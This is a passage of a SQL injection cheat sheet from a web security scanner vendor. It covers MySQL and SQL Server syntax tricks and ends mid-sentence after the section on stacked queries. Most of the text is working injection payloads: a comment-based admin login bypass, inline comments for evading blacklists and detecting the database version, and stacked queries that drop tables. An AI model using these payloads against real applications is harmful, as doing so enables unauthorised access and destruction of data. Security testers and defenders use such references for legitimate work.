SQL Injection Cheat Sheet
Find and exploit SQL Injections with Netsparker, Next Generation Web Application Security Scanner
SQL Injection Cheat Sheet, Document Version 1.4
About SQL Injection Cheat Sheet

Currently only for MySQL and Microsoft SQL Server, with some Oracle and some PostgreSQL. Most of the samples are not correct for every single situation. Most real-world environments will differ because of parentheses, different code bases and unexpected, strange SQL statements. The samples are provided so the reader can get a basic idea of a potential attack, and almost every section includes brief information about itself.

Legend:
  M : MySQL
  S : SQL Server
  P : PostgreSQL
  O : Oracle
  + : Possibly all other databases

Examples:
  (MS) means: MySQL and SQL Server, etc.
  (M*S) means: only in some versions of MySQL or under special conditions (see the related note), and SQL Server
Table Of Contents

1. About SQL Injection Cheat Sheet
2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
   1. Line Comments
      - Line Comments Sample SQL Injection Attacks
   2. Inline Comments
      - Classical Inline Comment SQL Injection Attack Samples
      - MySQL Version Detection Sample Attacks
   3. Stacking Queries
      - Language / Database Stacked Query Support Table
      - Stacked SQL Injection Attack Samples
   4. If Statements
      - MySQL If Statement
      - SQL Server If Statement
      - If Statement SQL Injection Attack Samples
   5. Using Integers
   6. String Operations
      - String Concatenation
   7. Strings without Quotes
      - Hex based SQL Injection Samples
   8. String Modification & Related
   9. Union Injections
      - UNION - Fixing Language Issues
   10. Bypassing Login Screens
   11. Enabling xp_cmdshell in SQL Server 2005
   12. Other parts are not so well formatted, but check them out by yourself: drafts, notes and stuff, scroll down and see.
Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks

Ending / Commenting Out / Line Comments
Line Comments

Comments out the rest of the query. Line comments are generally useful for ignoring the rest of the query so you don't have to deal with fixing the syntax.

  --   (SM)
  DROP sampletable;--

  #    (M)
  DROP sampletable;#

Line Comments Sample SQL Injection Attacks
  Username: admin'--

  SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'

This is going to log you in as the admin user, because the rest of the SQL query will be ignored.

Inline Comments

Comments out the rest of the query by not closing them, or can be used for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

  /*Comment Here*/   (SM)
  DROP/*comment*/sampletable
  SELECT/*avoid-spaces*/password/**/FROM/**/Members

  /*! MYSQL Special SQL */   (M)

This is a special comment syntax for MySQL. It's perfect for detecting the MySQL version. If you put code inside these comments it's going to execute in MySQL only. You can also use this to execute some code only if the server version is higher than the supplied version.

  SELECT /*!32302 1/0, */ 1 FROM tablename

Classical Inline Comment SQL Injection Attack Samples
  ID: 10; DROP TABLE members /*
  Simply gets rid of the other stuff at the end of the query. Same as: 10; DROP TABLE members --

  SELECT /*!32302 1/0, */ 1 FROM tablename
  Will throw a division by 0 error if the MySQL version is higher than 3.23.02

MySQL Version Detection Sample Attacks
  ID: /*!32302 10*/
  ID: 10
  You will get the same response if the MySQL version is higher than 3.23.02

  SELECT /*!32302 1/0, */ 1 FROM tablename
  Will throw a division by 0 error if the MySQL version is higher than 3.23.02

Stacking Queries
Executing more than one query in one transaction. This is very useful at every injection point, especially in SQL Server back-ended applications.

  ;   (S)
  SELECT * FROM members; DROP members--
  Ends a query and starts a new one.

Language / Database Stacked Query Support Table

green: supported, dark gray: not supported, light gray: unknown

  [Table: rows ASP, ASP.NET, PHP, Java; columns SQL Server, MySQL, PostgreSQL, ORACLE, MS Access; the colour-coded cell values are not preserved in the text]
About MySQL and PHP; To clarify som